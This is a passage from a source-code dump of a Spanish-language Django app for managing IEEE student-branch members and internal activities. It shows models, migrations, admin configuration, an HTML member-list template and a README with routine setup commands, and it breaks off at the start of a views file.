"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 25,
"path": "/miembro/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Miembro, Genero, Eps, Ciudad, Barrio, Tipo_sangre, Sede, Rol_miembro, User\n\n# Register your models here.\nadmin.site.register(Genero)\nadmin.site.register(Eps)\nadmin.site.register(Ciudad)\nadmin.site.register(Tipo_sangre)\nadmin.site.register(Sede)\nadmin.site.register(Rol_miembro)\n\n\[email protected](Miembro)\nclass MiembroAdmin(admin.ModelAdmin):\n list_display = ('nombres', 'apellidos', 'correo_institucional', 'correo_personal', 'fecha_nacimiento', 'edad', 'mayor_de_edad','celular', 'genero', 'eps', 'barrio', 'ciudad', 'tipo_sangre', 'sede', 'rol_miembro', 'activo')\n list_display_links = ('nombres', 'apellidos', 'correo_institucional', 'correo_personal', 'fecha_nacimiento', 'edad', 'mayor_de_edad','celular', 'genero', 'eps', 'barrio', 'ciudad','tipo_sangre', 'sede', 'rol_miembro')\n list_filter = ('barrio__ciudad', 'genero', 'sede', 'rol_miembro', 'eps', 'tipo_sangre', 'activo')\n search_fields = ('nombres', 'apellidos', 'barrio__descripcion', 'barrio__ciudad__descripcion', 'celular', 'rol_miembro__descripcion', 'genero__descripcion', 'barrio__descripcion', 'tipo_sangre__descripcion')\n\[email protected](Barrio)\nclass BarrioAdmin(admin.ModelAdmin):\n list_display = ('descripcion','ciudad')\n list_display_links = ('descripcion','ciudad')\n list_filter = ('ciudad',)"
},
{
"alpha_fraction": 0.8062283992767334,
"alphanum_fraction": 0.8131487965583801,
"avg_line_length": 18.266666412353516,
"blob_id": "1d8de5ac9e151573978e2291c00e8044ef1913e0",
"content_id": "7d90dcdff715d8d473b504319345a4ae67e7b848",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/README.md",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "ieee_etitc\n\nCree un entorno virtual con Python3\n\nDentro del entorno virtual ejecute: pip3 install Django\n\nLuego vaya a la carpeta que contiene el manage.py y ejecute: \n\npython manage.py makemigrations\n\npython manage.py migrate\n\npython manage.py createsuperuser\n\npython manage.py runserver\n"
},
{
"alpha_fraction": 0.48554572463035583,
"alphanum_fraction": 0.4877089560031891,
"avg_line_length": 29.455089569091797,
"blob_id": "0f2a2a4582a69ee9f171897975aa8606533f11dd",
"content_id": "35da46f402f3f0a4524c3f07760a8d621968f8d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5087,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 167,
"path": "/miembro/templates/miembro/miembro_listar.html",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "{% extends 'base/base.html' %}\n{% block miembros %}<strong>Miembros</strong>{% endblock %}\n{% block page_content%}\n\n <div class=\"wrapper \">\n \t<nav id=\"sidebar\">\n \t\t<div class=\"sidebar-header\">\n \t\t\t<h3>Miembros</h3>\n \t\t</div>\n \t\t\n \t\t\n \t\t<ul class=\"list-unstyled components\">\n \t\t\n {% if perms.miembro.change_miembro%}\n <li>\n\t\t\t\t\t<a href=\"{{BASE_DIR}}/admin/miembro/miembro/add/\">Crear</a>\n\t\t\t\t</li>\n \t\t {% endif %}\n {% if perms.miembro.change_miembro%}\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"{{BASE_DIR}}/admin/miembro/miembro/\">Listar</a>\n\t\t\t\t</li>\n\t\t\t{%else %}\n\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"#\">Listar</a>\n\t\t\t\t</li>\n\t\t\t{%endif%}\n\t\t\t\t<li>\n\t\t\t\t\t<a href=\"#pageSubmenu\" data-toggle=\"collapse\" aria-expanded=\"false\" class=\"dropdown-toggle\">Filtar</a>\n\t\t\t\t\t<ul class=\"collapse list-unstyled\" id=\"pageSubmenu\">\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Nombre</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Carrera</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t\t<li>\n\t\t\t\t\t\t\t<a href=\"#\">Capitulo</a>\n\t\t\t\t\t\t</li>\n\t\t\t\t\t</ul> \n\t\t\t\t</li>\n\t\t\t \n\t\t\t\t<li>\n \t\t\t\t<a href=\"#\">Puntos</a>\n\t\t\t\t</li>\n \t\t\t</ul>\n \t\t</nav>\n \t\n \t\t<div class=\"content\">\n \t\t<nav class=\"navbar navbar-expand-lg navbar-light bg-light\">\n\t</nav>\n</div>\n\n\t<div class='container-fluid'>\n\t\t<div class=''>\n\t\t\t<div class=\"card shadow\">\n <!-- Card Header - Dropdown -->\n <div class=\"card-header d-flex flex-row align-items-center justify-content-between\">\n <h6 class=\"m-0 font-weight-bold text-primary\">Listado de miembros</h6>\n <div class=\"dropdown no-arrow\">\n <a class=\"dropdown-toggle\" href=\"#\" role=\"button\" id=\"dropdownMenuLink\" data-toggle=\"dropdown\"\n aria-haspopup=\"true\" aria-expanded=\"false\">\n <i class=\"fas fa-ellipsis-v fa-sm fa-fw text-gray-400\"></i>\n </a>\n \n </div>\n </div>\n <!-- Card Body -->\n <div class=\"card-body\">\n {% if not obj %}\n <div class=\"alert alert-info\">No hay usuarios registrados</div>\n {% else %}\n <table class=\"table table-striped table-hover\">\n <thead>\n <!--<th>RFID</th>-->\n <th>Nombres</th>\n <th>Apellidos</th>\n <th>Correo institucional</th>\n <th>Fecha de ingreso</th>\n {% if perms.miembro.change_miembro%}\n <th class=\"all\">Acciones</th>\n {% endif %}\n </thead>\n <tbody>\n {% for item in obj %}\n {%if item.activo%}\n <tr>\n <td>{{ item.nombres }}</td>\n <td>{{ item.apellidos }}</td>\n <td>{{ item.correo_institucional}}</td>\n <td>{{ item.fc|date:\"d/m/Y H:i:s\"}}</td>\n {#%if user.is_staff%#}\n <td>\n {% if perms.miembro.change_miembro%}\n <a href=\"{{BASE_DIR}}/admin/miembro/miembro/{{item.id}}/change/\"\n class=\"btn btn-warning btn-circle\"\n role=\"button\"><i class=\"far fa-edit\"></i></a>\n {%endif%}\n {% if perms.miembro.change_miembro%}\n <a href=\"{% url 'miembro:miembro_inactivar' item.id %}\"\n class=\"btn btn-danger btn-circle\" role=\"button\"><i class=\"far fa-thumbs-down\"></i></a>\n {%endif%}\n </td>\n {#% endif %#}\n </tr>\n {%endif%}\n {% endfor %}\n </tbody>\n </table>\n {% endif %}\n </div>\n{% endblock %}\n\n\n{% block js_page %}\n<script>\n // Call the dataTables jQuery plugin\n $(document).ready(function() {\n $('.table').DataTable({\n \"language\": {\n \"sProcessing\": \"Procesando...\",\n \"sLengthMenu\": \"Registros por página: _MENU_\",\n \"sZeroRecords\": \"No se encontraron resultados\",\n \"sEmptyTable\": \"Ningún dato disponible en esta tabla\",\n 
\"sInfo\": \"Mostrando registros del _START_ al _END_ de un total de _TOTAL_ registros\",\n \"sInfoEmpty\": \"Mostrando registros del 0 al 0 de un total de 0 registros\",\n \"sInfoFiltered\": \"(filtrado de un total de _MAX_ registros)\",\n \"sInfoPostFix\": \"\",\n \"sSearch\": \"Buscar:\",\n \"sUrl\": \"\",\n \"sInfoThousands\": \",\",\n \"sLoadingRecords\": \"Cargando...\",\n \"oPaginate\": {\n \"sFirst\": \"<span class='fa fa-angle-double-left'></span>\",\n \"sLast\": \"<span class='fa fa-angle-double-right'></span>\",\n \"sNext\": \"<span class='fa fa-angle-right'></span>\",\n \"sPrevious\": \"<span class='fa fa-angle-left'></span>\"\n },\n \"oAria\": {\n \"sSortAscending\": \": Activar para ordenar la columna de manera ascendente\",\n \"sSortDescending\": \": Activar para ordenar la columna de manera descendente\"\n }\n }\n });\n });\n\n\n</script>\n\t\t</div>\n\t</div>\n \t\n \t\n \t\n </div>\n \n\n <script>\n\t $(document).ready(function(){\n\t\t\t$('#sidebarCollapse').on('click',function(){\n\t\t\t\t$('#sidebar').toggleClass('active');\n\t\t\t});\n\t\t}); \n\t</script>\n\n\n{% endblock %}"
},
{
"alpha_fraction": 0.7782101035118103,
"alphanum_fraction": 0.7782101035118103,
"avg_line_length": 24.799999237060547,
"blob_id": "21f2fa4029bdaaf94c587b6adf0364b514e2c85c",
"content_id": "cef0f3b5a8db185be33392aaae0dde1004e3be07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 10,
"path": "/bases/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views import generic\n\n\nclass Home( generic.TemplateView ):\n template_name = 'bases/home.html'\n login_url='bases:login'"
},
{
"alpha_fraction": 0.6033959984779358,
"alphanum_fraction": 0.6185566782951355,
"avg_line_length": 36.477272033691406,
"blob_id": "006c3061aab9fa20ae56195bec51554b6756bfcf",
"content_id": "086841010bc39061d1e1c63e9d963a36a8608871",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 44,
"path": "/miembro/migrations/0002_auto_20200525_1611.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 21:11\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('miembro', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rol_miembro',\n options={'verbose_name': 'Rol miembro', 'verbose_name_plural': 'Roles miembro'},\n ),\n migrations.AlterModelOptions(\n name='tipo_sangre',\n options={'verbose_name': 'Tipo de sangre', 'verbose_name_plural': 'Tipos de sangre'},\n ),\n migrations.AlterField(\n model_name='miembro',\n name='correo_institucional',\n field=models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico institucional'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='correo_personal',\n field=models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico personal'),\n ),\n migrations.AlterField(\n model_name='miembro',\n name='usuario',\n field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='rol_miembro',\n name='descripcion',\n field=models.CharField(help_text='Descripción del rol del miembro dentro de la rama', max_length=45, unique=True, verbose_name='Descripción rol'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5492610931396484,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 21.55555534362793,
"blob_id": "8d01e935289832c7a93bbe6cfc7984b8754ab95b",
"content_id": "71aa25a5a201f03a073734413790bd1e044b8606",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 18,
"path": "/actividad_interna/migrations/0002_auto_20200526_0138.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-26 06:38\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('actividad_interna', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='actividad_interna',\n name='lugar_actividad',\n field=models.CharField(max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7870370149612427,
"alphanum_fraction": 0.7870370149612427,
"avg_line_length": 20.600000381469727,
"blob_id": "34691f7286baa9a23e649fd614def2ea03d72d06",
"content_id": "6f03dabe115f80f56988a7f97bdc73467c09efac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/actividad_interna/apps.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ActividadInternaConfig(AppConfig):\n name = 'actividad_interna'\n"
},
{
"alpha_fraction": 0.7182705998420715,
"alphanum_fraction": 0.7182705998420715,
"avg_line_length": 36.78947448730469,
"blob_id": "d16859ef9a8fcce075baa785415f6ccf49c6a82e",
"content_id": "f27acaa9dba9a0a4b67c8ae0bfcb178309ec23ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 717,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/actividad_interna/admin.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Tipo_actividad, Actividad_interna\n\n# Register your models here.\n\n\[email protected](Tipo_actividad)\nclass Tipo_actividadAdmin(admin.ModelAdmin):\n list_display = ('descripcion', 'activo')\n list_display_links = ('descripcion', 'activo', )\n list_filter = ('descripcion', 'activo', )\n\[email protected](Actividad_interna)\nclass ActividadInternaAdmin(admin.ModelAdmin):\n list_display = ('nombre','descripcion', 'solo_miembros', 'activo')\n list_display_links = ('nombre','descripcion')\n list_filter = ('tipo_actividad__descripcion', 'solo_miembros', 'activo')\n search_fields = ('nombre', 'descripcion', 'lugar_actividad', 'tipo_actividad__descripcion')"
},
{
"alpha_fraction": 0.5539854764938354,
"alphanum_fraction": 0.5576896667480469,
"avg_line_length": 25.699634552001953,
"blob_id": "22c5bb0d9a75bfbdc9e9ae98a29a692da2a380ad",
"content_id": "66498c0cd4ed3ca6f5cfe18888945c4708e841d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7313,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 273,
"path": "/miembro/models.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Genero( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del género',\n unique=True,\n verbose_name='Descripción género'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Genero, self ).save()\n\n class Meta:\n verbose_name = 'Género'\n verbose_name_plural = 'Géneros'\n\n#################################################################################\nclass Eps( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción de la EPS',\n unique=True,\n verbose_name='Descripción EPS'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Eps, self ).save()\n\n class Meta:\n verbose_name = 'EPS'\n verbose_name_plural = \"EPS's\"\n\n#################################################################################\nclass Ciudad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción de la ciudad',\n unique=True,\n verbose_name='Descripción ciudad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Ciudad, self ).save()\n\n class Meta:\n verbose_name = 'Ciudad'\n verbose_name_plural = \"Ciudades\"\n\n#################################################################################\nclass Barrio( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del barrio',\n unique=True,\n verbose_name='Descripción barrio'\n )\n\n ciudad = models.ForeignKey(Ciudad, on_delete=models.PROTECT)\n\n nota = models.TextField(blank=True)\n\n def get_ciudad(self):\n return self.ciudad\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Barrio, self ).save()\n\n class Meta:\n verbose_name = 'Barrio'\n verbose_name_plural = \"Barrios\"\n\n#################################################################################\nclass Tipo_sangre( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de sangre',\n unique=True,\n verbose_name='Descripción tipo de sangre'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Tipo_sangre, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de sangre'\n verbose_name_plural = \"Tipos de sangre\"\n\n#################################################################################\nclass Sede( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=255,\n help_text='Descripción de la sede dende estudia',\n unique=True,\n verbose_name='Descripción sede'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Sede, self ).save()\n\n class Meta:\n verbose_name = 'Sede'\n verbose_name_plural = 'Sedes'\n\n#################################################################################\nclass Rol_miembro( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n 
help_text='Descripción del rol del miembro dentro de la rama',\n unique=True,\n verbose_name='Descripción rol'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Rol_miembro, self ).save()\n\n class Meta:\n verbose_name = 'Rol miembro'\n verbose_name_plural = 'Roles miembro'\n\n#################################################################################\n\nclass Miembro(ClaseModelo):\n\n nombres = models.CharField(\n max_length=45,\n # help_text='Nombres del miembro',\n verbose_name='Nombres'\n )\n\n apellidos = models.CharField(\n max_length=45,\n # help_text='Apellidos del miembro',\n verbose_name='Apellidos'\n )\n\n correo_institucional = models.EmailField(\n max_length=70,\n # help_text='Correo electrónico del miembro',\n verbose_name='Correo electrónico institucional',\n unique=True\n )\n\n correo_personal = models.EmailField(\n max_length=70,\n # help_text='Correo electrónico del miembro',\n verbose_name='Correo electrónico personal',\n unique=True\n )\n\n\n fecha_nacimiento = models.DateField(null=True)\n \n celular = models.CharField(max_length=15, null=True)\n \n genero = models.ForeignKey(Genero,\n help_text='Gérero del miembro',\n verbose_name='Género',\n on_delete=models.PROTECT,\n null=True\n )\n \n eps = models.ForeignKey(Eps,\n help_text='EPS del miembro',\n verbose_name='EPS',\n on_delete=models.PROTECT,\n null=True\n )\n\n barrio = models.ForeignKey(Barrio,\n help_text='Barrio donde vive el miembro',\n verbose_name='Barrio',\n on_delete=models.PROTECT,\n null=True\n )\n\n tipo_sangre = models.ForeignKey(Tipo_sangre,\n help_text='Tipo de sangre del miembro',\n verbose_name='RH',\n on_delete=models.PROTECT,\n null=True\n )\n\n sede = models.ForeignKey(Sede,\n help_text='Sede donde estudia el miembro',\n verbose_name='Sede',\n on_delete=models.PROTECT,\n null=True\n )\n\n rol_miembro = models.ForeignKey(Rol_miembro,\n help_text='Rol del miembro dentro de la rama',\n verbose_name='Rol miembro',\n on_delete=models.PROTECT,\n null=True\n )\n\n usuario = models.OneToOneField(User,\n on_delete=models.PROTECT\n )\n\n def edad(self):\n hoy = date.today()\n fechanacimiento=self.fecha_nacimiento\n edad = hoy.year - fechanacimiento.year - ((hoy.month, hoy.day) < (fechanacimiento.month, fechanacimiento.day))\n return edad\n\n def mayor_de_edad(self):\n hoy = date.today()\n fechanacimiento=self.fecha_nacimiento\n edad = hoy.year - fechanacimiento.year - ((hoy.month, hoy.day) < (fechanacimiento.month, fechanacimiento.day))\n return edad>17\n \n mayor_de_edad.boolean = True\n\n def ciudad(self):\n return self.barrio.ciudad\n\n def save(self):\n self.nombres = self.nombres.upper()\n self.apellidos = self.apellidos.upper()\n self.correo_institucional = self.correo_institucional.lower()\n self.correo_personal = self.correo_personal.lower()\n super( Miembro, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombres + \" \" + self.apellidos )\n\n class Meta:\n verbose_name = 'Miembro'\n verbose_name_plural = 'Miembros'\n"
},
{
"alpha_fraction": 0.5658153295516968,
"alphanum_fraction": 0.5701811909675598,
"avg_line_length": 55.208587646484375,
"blob_id": "951d83d6165f401893bd005f481d88548d4623cd",
"content_id": "c86166e5e054830234a1c841559a576f1ec39a51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9184,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 163,
"path": "/miembro/migrations/0001_initial.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.6 on 2020-05-25 05:07\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Barrio',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del barrio', max_length=45, unique=True, verbose_name='Descripción barrio')),\n ('nota', models.TextField(blank=True)),\n ],\n options={\n 'verbose_name': 'Barrio',\n 'verbose_name_plural': 'Barrios',\n },\n ),\n migrations.CreateModel(\n name='Ciudad',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la ciudad', max_length=45, unique=True, verbose_name='Descripción ciudad')),\n ],\n options={\n 'verbose_name': 'Ciudad',\n 'verbose_name_plural': 'Ciudades',\n },\n ),\n migrations.CreateModel(\n name='Eps',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la EPS', max_length=45, unique=True, verbose_name='Descripción EPS')),\n ],\n options={\n 'verbose_name': 'EPS',\n 'verbose_name_plural': \"EPS's\",\n },\n ),\n migrations.CreateModel(\n name='Genero',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del género', max_length=45, unique=True, verbose_name='Descripción género')),\n ],\n options={\n 'verbose_name': 'Género',\n 'verbose_name_plural': 'Géneros',\n },\n ),\n migrations.CreateModel(\n name='Rol_miembro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción 
de la sede dende estudia', max_length=45, unique=True, verbose_name='Descripción sede')),\n ],\n options={\n 'verbose_name': 'Rol miembro',\n 'verbose_name_plural': 'Rol miembro',\n },\n ),\n migrations.CreateModel(\n name='Sede',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción de la sede dende estudia', max_length=255, unique=True, verbose_name='Descripción sede')),\n ],\n options={\n 'verbose_name': 'Sede',\n 'verbose_name_plural': 'Sedes',\n },\n ),\n migrations.CreateModel(\n name='Tipo_sangre',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('descripcion', models.CharField(help_text='Descripción del tipo de sangre', max_length=45, unique=True, verbose_name='Descripción tipo de sangre')),\n ],\n options={\n 'verbose_name': 'Tipo_sangre',\n 'verbose_name_plural': 'Tipo_sangre',\n },\n ),\n migrations.CreateModel(\n name='Miembro',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('estado', models.BooleanField(default=True)),\n ('fc', models.DateTimeField(auto_now_add=True)),\n ('fm', models.DateTimeField(auto_now=True)),\n ('uc', models.IntegerField(blank=True, editable=False, null=True)),\n ('um', models.IntegerField(blank=True, editable=False, null=True)),\n ('nombres', models.CharField(max_length=45, verbose_name='Nombres')),\n ('apellidos', models.CharField(max_length=45, verbose_name='Apellidos')),\n ('correo_institucional', models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico')),\n ('correo_personal', models.EmailField(max_length=70, unique=True, verbose_name='Correo electrónico')),\n ('fecha_nacimiento', models.DateField(null=True)),\n ('celular', models.CharField(max_length=15, null=True)),\n ('barrio', models.ForeignKey(help_text='Barrio donde vive el miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Barrio', verbose_name='Barrio')),\n ('eps', models.ForeignKey(help_text='EPS del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Eps', verbose_name='EPS')),\n ('genero', models.ForeignKey(help_text='Gérero del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Genero', verbose_name='Género')),\n ('rol_miembro', models.ForeignKey(help_text='Rol del miembro dentro de la rama', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Rol_miembro', verbose_name='Rol miembro')),\n ('sede', models.ForeignKey(help_text='Sede donde estudia el miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Sede', verbose_name='Sede')),\n ('tipo_sangre', models.ForeignKey(help_text='Tipo de sangre del miembro', null=True, on_delete=django.db.models.deletion.PROTECT, to='miembro.Tipo_sangre', verbose_name='RH')),\n ('usuario', 
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Miembro',\n 'verbose_name_plural': 'Miembros',\n },\n ),\n migrations.AddField(\n model_name='barrio',\n name='ciudad',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='miembro.Ciudad'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5894396305084229,
"alphanum_fraction": 0.59375,
"avg_line_length": 26.294116973876953,
"blob_id": "e7f22cd786896daa68158e3b05abac6f82e82b36",
"content_id": "610973e40c5af81d95dbe8d95ccecb1c79716888",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1860,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 68,
"path": "/actividad_interna/models.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom bases.models import ClaseModelo\nfrom django.contrib.auth.models import User\n# Create your models here.\n\nfrom datetime import date\n\n#################################################################################\nclass Tipo_actividad( ClaseModelo ):\n\n descripcion = models.CharField(\n max_length=45,\n help_text='Descripción del tipo de actividad',\n unique=True,\n verbose_name='Descripción tipo actividad'\n )\n\n def __str__(self):\n return '{}'.format( self.descripcion )\n\n def save(self):\n self.descripcion = self.descripcion.upper()\n super( Tipo_actividad, self ).save()\n\n class Meta:\n verbose_name = 'Tipo de actividad'\n verbose_name_plural = 'Tipos de actividades'\n\n\n#################################################################################\n\nclass Actividad_interna(ClaseModelo):\n\n tipo_actividad = models.ForeignKey(Tipo_actividad, on_delete=models.PROTECT)\n \n nombre = models.CharField(\n max_length=255,\n help_text='Nombre de la actividad',\n verbose_name='Nombre actividad'\n )\n\n descripcion = models.TextField(\n help_text='Descripción de la actividad',\n verbose_name='Descripción de la actividad'\n )\n\n fecha_actividad = models.DateTimeField(\n )\n\n lugar_actividad = models.CharField(max_length=255)\n\n solo_miembros = models.BooleanField(default=False\n )\n\n\n def save(self):\n self.nombre = self.nombre.upper()\n self.descripcion = self.descripcion.capitalize()\n self.lugar_actividad = self.lugar_actividad.upper()\n super( Actividad_interna, self ).save()\n \n def __str__(self):\n return '{}'.format( self.nombre)\n\n class Meta:\n verbose_name = 'Actividad interna'\n verbose_name_plural = 'Actividades internas'\n"
},
{
"alpha_fraction": 0.6289905309677124,
"alphanum_fraction": 0.6289905309677124,
"avg_line_length": 25.976743698120117,
"blob_id": "b6cca5b7be83ca0e5f79d82dc20c29a697c10252",
"content_id": "2a52ee076e5ead597e806789ed64a41db5ffa773",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 43,
"path": "/miembro/views.py",
"repo_name": "davalerova/ieee-etitc",
"src_encoding": "UTF-8",
